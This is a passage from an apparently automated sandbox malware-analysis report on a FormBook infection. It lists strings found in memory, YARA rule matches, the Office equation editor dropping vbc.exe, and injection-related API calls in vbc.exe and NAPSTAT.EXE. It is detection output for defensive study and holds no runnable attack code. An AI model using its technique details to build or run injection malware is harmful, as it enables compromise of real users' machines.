      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
      Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000007.00000000.2337234886.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000007.00000000.2332531261.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
      Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B EnumWindows,NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003154F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315A6C NtProtectVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003106B1 NtSetInformationThread,CloseServiceHandle,TerminateProcess,CreateFileA,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315336 NtSetInformationThread,LoadLibraryA,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031232A NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315F9F NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031078C CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315435 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316039 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316015 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312455 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003104B2 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003124BD NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316089 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003160D1 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003104CD NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312531 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310537 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310516 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316106 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031059D NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003161ED NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003105D9 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316239 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031260D NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003162C5 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316325 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312705 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310F7D NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031276A NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315FE5 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003147EF NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003123D5 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315FC1 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B EnumWindows,NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003154F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315A6C NtProtectVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003106B1 NtSetInformationThread,CloseServiceHandle,TerminateProcess,CreateFileA,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315336 NtSetInformationThread,LoadLibraryA,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031232A NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315F9F NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031078C CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315435 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316039 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316015 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312455 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003104B2 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003124BD NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316089 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003160D1 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003104CD NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312531 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310537 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310516 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316106 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031059D NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003161ED NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003105D9 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316239 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031260D NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003162C5 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316325 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312705 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310F7D NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031276A NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315FE5 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003147EF NtSetInformationThread,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003123D5 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315FC1 NtResumeThread,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FEA0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FC90 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98F900 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9900C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E990048 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E990078 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FE24 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FFFC NtCreateProcessEx,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FF34 NtQueueApcThread,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FC30 NtOpenProcess,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FC48 NtSetInformationFile,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E990C40 NtGetContextThread,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E991D80 NtSuspendThread,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FD5C NtEnumerateKey,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FAB8 NtQueryValueKey,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FA20 NtQueryInformationFile,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FA50 NtEnumerateValueKey,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FBE8 NtQueryVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FB50 NtCreateKey,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98F8CC NtWaitForSingleObject,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98F9F0 NtClose,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98F938 NtWriteFile,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E991930 NtSetContextThread,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9907AC NtCreateMutant,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9910D0 NtOpenProcessToken,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E990060 NtQuerySection,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9901D4 NtSetValueKey,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E99010C NtOpenDirectoryObject,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E991148 NtOpenThread,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5A6C NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B00C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B07AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AF900 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AF9F0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B0048 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B0060 NtQuerySection,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B0078 NtResumeThread,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B10D0 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B010C NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B1148 NtOpenThread,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B01D4 NtSetValueKey,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFA20 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFA50 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFAB8 NtQueryValueKey,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFB50 NtCreateKey,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFBB8 NtQueryInformationToken,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFBE8 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AF8CC NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AF938 NtWriteFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B1930 NtSetContextThread,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFE24 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFEA0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFFB4 NtCreateSection,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFFFC NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFC30 NtOpenProcess,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFC48 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B0C40 NtGetContextThread,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFC60 NtMapViewOfSection,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFC90 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFD5C NtEnumerateKey,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFD8C NtDelayExecution,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B1D80 NtSuspendThread,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099D50 NtCreateFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099E00 NtReadFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099E80 NtClose,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099F30 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099D4B NtCreateFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099DA4 NtCreateFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099DFE NtReadFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099E7A NtClose,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099F2B NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403858
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00401218
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403C2E
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403A59
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403AEE
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403A87
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403B49
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403B13
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403858
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00401218
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403C2E
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403A59
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403AEE
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403A87
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403B49
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403B13
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9BEE4C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9B0F3F
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA3FDDD
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9D0D3B
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9ACD5B
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA53A83
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA4CBA4
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E99FBD7
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA2DBDA
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9C7B00
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA3F8EE
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9AC85C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9C286D
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A29B2
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA4098E
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9B69FE
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA25955
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A4680
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9AE6C1
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA42622
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9AC7BC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA2579A
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9B1489
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9D5485
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9BC5F0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A351F
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E99E2E9
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA41238
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9C63DB
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E99F3CF
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A2305
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A7353
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9EA37B
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E99E0C6
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9B905A
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A3040
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02161238
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020BE2E9
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C2305
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C7353
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0210A37B
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_021663BF
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020BF3CF
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020E63DB
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020ED005
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C3040
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020D905A
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020BE0C6
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0210A634
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02162622
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C4680
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020CE6C1
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0214579A
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020CC7BC
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020F57C3
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0214443E
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020FD47D
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020D1489
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020F5485
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C351F
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02106540
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020DC5F0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02173A83
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020E7B00
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0216CBA4
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0214DBDA
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020BFBD7
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020CC85C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020E286D
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0215F8EE
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02145955
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0214394B
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0216098E
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C29B2
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020D69FE
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020F2E2F
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020DEE4C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020D0F3F
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020EDF7C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0215CFB1
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02132FDC
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020F0D3B
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020CCD5B
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0215FDDD
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009E5ED
